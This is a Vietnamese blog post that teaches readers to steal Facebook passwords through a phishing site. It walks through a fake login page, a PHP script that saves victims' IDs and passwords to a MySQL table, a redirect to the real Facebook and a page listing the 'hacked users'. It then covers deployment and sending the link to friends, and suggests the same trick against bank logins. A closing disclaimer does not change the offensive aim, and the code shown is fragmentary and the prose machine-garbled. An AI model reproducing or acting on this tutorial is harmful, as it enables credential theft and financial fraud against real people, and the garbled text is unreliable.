Code Hack Nick Facebook Mới Nhất 2022 – Thành Công 99%

Sử dụng code hack nick facebook là một cách mang lại hiệu quả khá cao so với những phương pháp khác. Tuy nhiên để có thể sử dụng thành công cách này thì không phải ai cũng làm được và không phải ai cũng có mã code đúng để hack Facebook. Chính bởi vậy, bài viết dưới đây Tâm Blogs sẽ chia sẻ chi tiết đến bạn cách sử dụng code hack nick facebook chi tiết và chính xác nhất. Hãy cùng tìm hiểu thông tin chi tiết qua bài viết dưới đây nhé!

Code Hack Nick Facebook Chuẩn Nhất

Khái Niệm Code Hack Nick Facebook Là Gì?

Hack facebook bằng code mang đến hiệu suất cao khá cao tuy nhiên cách này chỉ hoàn toàn có thể triển khai thành công xuất sắc khi bạn có 1 số ít kỹ năng và kiến thức nền tảng nhất định về code. Mặt khác, bạn cũng chỉ nên sử dụng mã code này trong những trường hợp thiết yếu và tương thích .
Và cũng không nên lạm dụng nó cho những hành vi có mục tiêu xấu để : lừa lọc, chiếm đoạt gia tài cá thể hoặc có những hành vi vi phạm pháp lý, gây ảnh hưởng tác động nghiêm trọng cho chủ sở hữu tài khoản .

Vậy Để Hack Tài Khoản Facebook Cần Chuẩn Bị Những Gì?

Để có thể thực hiện code hack acc facebook, check pass facebook, code hack nick faceebook bạn cần chuẩn bị một số kiến thức và ngôn ngữ chuyên ngành như sau:

  • HTML
  • CSS
  • JavaScript
  • PHP and MySQL

Việc trang bị kỹ lưỡng những kiến thức cơ bản trước khi sử dụng code hack nick Facebook nhằm mục đích để tạo biểu mẫu đăng nhập giống y hết với mạng xã hội facebook. (Lúc này HTML và CSS sẽ được áp dụng tại đây). Khi đó người dùng sẽ lầm tưởng website có giao diện giống fb mà bạn tạo ra là Facebook thật nên sẽ điền tài khoản và mật khẩu để login vào.

Sau đó bạn sẽ tích lũy được cũng như cần tàng trữ toàn bộ những thông tin đăng nhập tương quan đến nick facebook này trong cơ sở tài liệu PHP và MySQLi. Tiếp đó sẽ chuyển hướng người dùng đến trang facebook gốc. ( JavaScript sẽ tương hỗ bạn thực thi điều đó )
Đây là cách hack nick facebook, hack pass Facebook bằng cách tận dụng tiến công lừa đảo. Sau khi tìm hiểu thêm và thực hành thực tế đoạn code hack Facebook mà mình hướng dẫn thì bạn sẽ hoàn toàn có thể hack thông tin tài khoản fb người khác, tích lũy id cũng như mật khẩu đăng nhập của vô số thông tin tài khoản khác .

Xem thêm : Phần Mềm Hack Facebook

Sử Dụng Code Hack Nick Facebook Cần Có Những Bước Nào?

Để sử dụng code hack nick Facebook bạn cần sẵn sàng chuẩn bị 1 số ít những bước sau :

Bước 1: Tạo một website đăng nhập giống với facebook bằng code hack facebook, kèm theo đó sẽ là những thông tin được mô tả chi tiết nhất. Ngoài ra bạn cũng đừng quên kèm theo ảnh và cả tin nhắn

Bước 2: Tạo tập lệnh để xử lý trang đăng nhập. Mục đích của việc này là lưu trữ mọi thông tin có trong cơ sở dữ liệu của mình

Bước 3: Tạo cơ sở dữ liệu để lưu trữ ID và mật khẩu Facebook. Sau đó hãy gửi liên kết đăng nhập cho người sử dụng

Bước 4:  Tạo trang web nhằm xem ID và mật khẩu nick facebook bị hack.

Sau khi gửi link ( địa chỉ url ) đến đúng đối tượng người dùng bạn muốn hack thông tin tài khoản, việc của bạn là chờ đón họ sẽ tự động hóa phân phối tên thông tin tài khoản đăng nhập và mật khẩu nick facebook trong cơ sở tài liệu của bạn. Hoặc bạn cũng hoàn toàn có thể tự tạo một website để nhằm mục đích mục tiêu xem list mật khẩu nick facebook của người dùng bị nhắm tiềm năng

Bước 5: Sau khi đã hoàn thành các bước trên, bạn hãy chờ đợi để nhận thông tin chi tiết nhất về id và mật khẩu tài khoản facebook đang bị code tấn công.

Tuy nhiên, việc trình diễn những cách làm trên có phần hơi khó hiểu cho nhiều bạn. Để giúp bạn hoàn toàn có thể hiểu một cách cụ thể cũng như nắm rõ cách làm để thuận tiện thành công xuất sắc thì dưới đây Tâm Blogs sẽ san sẻ chi tiết cụ thể đến bạn từng cách làm. Cụ thể :

Xem thêm : 17 Cách Hack Facebook Mới Nhất Bạn Nên Biết

Tạo website đăng nhập giống với website đăng nhập facebook.

Tiếp theo đó, bạn hãy tạo một trang đăng nhập demo, với những đoạn code HTML dưới đây
Chú ý : Mã code tạo giao diện đăng nhập giống FB này chỉ hoàn toàn có thể thực thi trên thiết bị điện thoại di động. Vậy nên bạn cần tiến hành mã chuyển hướng nhằm mục đích chuyển hướng đối phương đến trang đăng nhập, dành cho điện thoại cảm ứng hoặc máy tính để sử dụng mã JavaScript. Lúc này bạn sẽ nhận được dãy mã đăng nhập chi tiết cụ thể như dưới đây :


Code Hack Nick Facebook


facebook
Login to continue to get top 10 exclusive tips to earn money in short time.Or

Create New Account

Forgotten password?

Help Centre
English (UK) English (US)
English (In) More
Facebook

Tuy nhiên, trước khi cho website trá hình này trực tuyến ( hiểu đơn thuần là bất kể ai cũng hoàn toàn có thể vào website này ) thì bạn nên thực thi mạng lưới hệ thống hack thông tin tài khoản facebook của người khác trong chính mạng lưới hệ thống máy tính cục bộ ( localhost ). Để làm được điều này, bạn cần tải và setup ứng dụng XAMPP về máy tính và thực thi thực thi những bước sau :

Lưu đoạn mã ở trên vào trong mục C:\xampp\htdocs\ với tên seekmoney.php >>>  đặt ảnh hiển thị bên trong kèm theo đó là thư mục cùng tên (Tuy nhiên, phần mở rộng là .jpg là earnmoney.jpg.)

Mở XAMPP đồng thời khởi động ApacheMySQL để bắt đầu vào công việc hack id và tài khoản facebook.

 Mở trình duyệt của mình >>>  Nhập localhost/seekmoney.php – Dưới đây sẽ là những hình ảnh minh họa cụ thể:

Đoạn mã hack nick facebook được san sẻ trên chỉ dành cho thiết bị di động. Tuy nhiên bạn cần phải tạo trang đăng nhập cho cả hai người sử dụng, trên cả di động và máy tính bàn, máy tính …

* * * Lưu ý : Đây chỉ là đoạn code tạo giao diện fb mẫu, bạn cần code lại cho giống hơn trang giao diện fb thật ở thời gian hiện tại .

Tiếp theo, tạo một trang đăng nhập với tên SeekmoneyD. php cho máy tính. Mục đích là để chuyển hướng người dùng máy tính đến trang này. Dưới đây là mã chuyển hướng để chuyển hướng người dùng, nhắm tiềm năng của bạn đến trang phiên bản dành cho máy tính .

Hãy đặt đoạn mã hack facebook trên ở ngay phần đầu của trang đăng nhập đã tạo trước đó .

Tạo script để lưu trữ mọi thông tin đăng nhập trên facebook

Đây chính là Script giải quyết và xử lý đăng nhập. Mục đích là tàng trữ thông tin đăng nhập của người bạn muốn hack Facebook >> > Sau đó, đặt tập tin trên vào thư mục với tên login.phpLogging in to facebook 
query($sql);
}
}
// redirect users to original facebook url
header("location: https://www.facebook.com");
exit();
?> 

Chuyển hướng người dùng đến url facebook gốc

Ở bước này bạn hoàn toàn có thể thuận tiện nhận thấy với hai bước thực thi trên, đoạn mã sau khi sử dụng sẽ chuyển hướng người dùng đến facebook gốc .
header ( “ location : https://www.facebook.com ” ) ;

Tạo cơ sở dữ liệu để lưu trữ id và mật khẩu facebook

Tại đây bạn sẽ tạo một cơ sở tài liệu cùng tên >> > Sau đó tạo một bảng có cùng tên gọi >> > Sau đó tạo những cột có cụ thể giống với đoạn mã bên trên ( Đây chính là cơ sở tài liệu có tên fbhackedusers bảng có tên fbusers, sau cuối là những cột là facebookid và facebookpassword ). Và để thực thi được những điều đó, bạn hãy làm theo những bước sau :

Bước 1:  Click chuột vào Admin, nằm ngay cạnh hàng MySQL trong bảng điều khiển XAMPP. Một trang web được mở ngay trong trình duyệt web mặc định của bạn với url http://localhost/phpmyadmin/

Bước 2: Click chuột vào databases.

Bước 3: Nhập tên cơ sở dữ liệu như fbhackedusers, nhấn nút Create.

Bước 4:  Nhập fbusers bên cạnh tên >>>  đặt 3 bên cạnh số cột. Kích chuột vào nút Tạo.

Bước 5 : Cung cấp thông tin cụ thể cho toàn bộ ba cột trên. Trong đó, cột tiên phong như S.No. dưới dạng tên. INT là loại, 6 là độ dài. Giá trị, Primary là chỉ mục, và ghi lại vào A.I tăng tự động hóa. Tất cả người dùng
Cột thứ hai giống như facebookid là Tên, VARCHAR – Loại, 40 là Length / Values
Cột thứ ba giống như mật khẩu facebook : Chính là Tên, VARCHAR làm Loại, 40 là Length / Values
Bước 6 : Khi phân phối những thông tin chi tiết cụ thể của 3 bước trên hãy ấn vào save. Điều này có nghĩa bạn đã thiết lập thành công xuất sắc cơ sở tài liệu cục bộ

Gửi link code hack facebook cho bạn bè

Lúc này việc của bạn là gửi link đến người mà bạn muốn hack nick facebook để triển khai lấy ID và mật khẩu nick thông tin tài khoản của họ trải qua trang code hack Facebook bạn vừa tạo .

Tạo website để liệt kê người dùng facebook bị tấn công

Để thuận tiện xem được id và mật khẩu nick facebook bị code hack facebook, bạn cần tạo một website. Sau đó hãy tìm nạp và liệt kê những thông tin tài khoản facebook Id, mật khẩu từ cơ sở tài liệu thuộc dạng bảng, điển hình như đoạn mã sau :List of Facebook Users Hacked by Me

query($sql);
echo "";
echo "";
echo "";
echo "";
echo "";
while($row=mysqli_fetch_row($res))
{
echo "";
}
echo "
Facebook IdFacebook Password
$row[1] $row[2]
"; ?>

Hãy đặt tên tệp này nằm trong cùng một thư mục với tên gọi hackeusers.php .

Ví Dụ Cụ Thể Về Cách Code Hack Nick Facebook

Sau khi hoàn tất hàng loạt những bước hướng dẫn trên thì bạn khởi đầu test thử xem code hack nick facebook có hoạt động giải trí hay không .

Bước 1: Bạn vào link localhost/seekmoney.php sẽ xuất hiện trang đăng nhập demo sau

Hướng dẫn code hack Facebook mới nhất

Bước 2: Bạn nhập id và mật khẩu tài khoản facebook ngẫu nhiên, pass sai cũng được.

Share code hack fb không cần phải mua

Bước 3: Sau khi nhập thông tin và nhấn nút đăng nhập. Lúc này tập lệnh xử lý đăng nhập của bạn sẽ lưu trữ thông tin chi tiết  trong cơ sở dữ liệu. Đồng thời chuyển hướng người dùng đến với URL facebook ban đầu.

Khi ID và mật khẩu tài khoản facebook của đối tượng cần hack được lưu trữ trong cơ sở dữ liệu đồng nghĩa bạn có thể xem danh sách những người sử dụng facebook bị tấn công. Bằng cách sử dụng chính trang web của mình >>> Hãy mở trình duyệt và nhập localhost/hackedusers.php.

Chia sẻ code hack fb mà không cần tốn tiền phải mua

Triển khai hệ thống code hack facebook trực tiếp ra ngoài mạng internet

Để mạng lưới hệ thống hack thông tin tài khoản của bạn hoạt động giải trí hãy triển khai làm theo 1 số ít bước sau đây :

  • Bước 1: Tạo thư mục có tên Facebook bên trong thư mục mẹ.
  • Bước 2 : Tạo một cơ sở tài liệu >> > Lập một bảng có cùng cơ sở tài liệu với những cụ thể, giống như đã sử dụng trong đoạn mã hack nick facebook đã san sẻ ở trên
  • Bước 3: Đặt tất cả các tệp earnmoney.php, earnmoneyD.php, login.php, hackedusers.php cùng tệp hình ảnh, ở đây earnmoney.jpg vào bên trong thư mục facebook đã tạo ở bước 1.

  • Bước 4: Gửi liên kết cho bạn bè của bạn, với link tamblogs.com/facebook/earnmoney.php

  • Bức 5: Mở liên kết trong trình duyệt của bạn, đó là tamblogs.com/facebook/hackedusers.php

Sau khi triển khai xong toàn bộ những bước trên bạn cần biến hóa một chuỗi liên kết. Hãy biến hóa localhost bằng chính địa chỉ hosting của mình. Root là tên người dùng cơ sở tài liệu. Mật khẩu sẽ là mật khẩu cơ sở tài liệu của bạn ( hoặc là để trống nếu bạn ko có tạo pass cho database ). Sau cùng thay thế sửa chữa localhost thành https://…
Ngoài ra, bạn hoàn toàn có thể triển khai 1 số ít biến hóa khác để tương thích với việc code hack nick facebook. Đây chỉ là bản demo giúp bạn hiểu được rằng bạn hoàn toàn có thể code hack facebook của bất kể ai bằng những hướng dẫn trên đây .

>> Nói tóm lại, để có thể thực hiện suôn sẻ, không lóng ngóng các bước trên thì bạn NHẤT ĐỊNH phải có kiến thức về CODE <<<

Xem thêm : Cách Hack Facebook Bằng Điện Thoại

Lưu Ý Cần Nắm Khi Sử Dụng Code Hack Nick Facebook

Cách hack một acc facebook bằng code không phải là việc làm quá phức tạp và bạn trọn vẹn hoàn toàn có thể vận dụng nó một cách thành công xuất sắc nếu triển khai đúng với những gì Tâm Blogs san sẻ ở trên .
Bạn cũng hoàn toàn có thể vận dụng chiêu thức này để hack những mạng xã hội khác ngoài facebook đấy, thậm chí còn là hack thông tin tài khoản ngân hàng nhà nước đấy …
Chẳng hạn như bạn gửi tin nhắn cho 1 người lạ với nội dung : Cách kiếm tiền nhanh gọn không mất phí tại Vietinbank ( kèm đường link web có giao diện đăng nhập y hệt trang đăng nhập thật của ngân hàng nhà nước ) >> > Nếu người xem tin nhắn “ nhẹ dạ, cả tin ” mà điền thông tin đăng nhập vào thì bạn đã có thông tin tài khoản ngân hàng nhà nước của người đó .
Các hacker chuyên nghiệp còn hoàn toàn có thể cài virus, mã độc vào những đường link web đó, dù người dùng chỉ click vào xem thôi mà không điền thông tin đăng nhập thì cũng có rủi ro tiềm ẩn bị hack thông tin tài khoản. Vì lẽ đó, khi bạn nhận được tin nhắn kèm 1 đường link lạ trên zalo, messenger … thì đừng dại mà click vào nhé !

Mình cũng khuyến khích các bạn KHÔNG NÊN sử dụng code hack nick facebook này một cách tùy tiện. Hãy sử dụng nó vào đúng mục đích như: chủ tài khoản facebook bị hack nick và cần lấy lại nick. Tuyệt đối không nên sử dụng vì mục đích xấu, bởi mọi hành vi sai trái sẽ khiến bạn phải chịu trách nhiệm trước pháp luật. Mức phạt có thể là cảnh cáo, phạt tiền hoặc phạt hình sự tùy vào mức độ nghiêm trọng về hành vi bạn gây ra

Trên đây là tổng hợp những chia sẻ kiến thức về cách code hack nick facebook chuẩn và mới nhất hiện nay để bạn áp dụng. Tuy nhiên, chính sách về bảo mật của Facebook luôn được thay đổi nên sẽ có thể cách thức này chỉ đúng phù hợp trong một thời điểm nhất định nào đó. Vậy nên khi có thay đổi nào diễn ra Tâm Blogs sẽ cập nhật mới nhất trong bài viết này. Chúc bạn thành công!

5/5 – ( 4 bầu chọn )

Source: https://vvc.vn
Category : Tin Mới

BẠN CÓ THỂ QUAN TÂM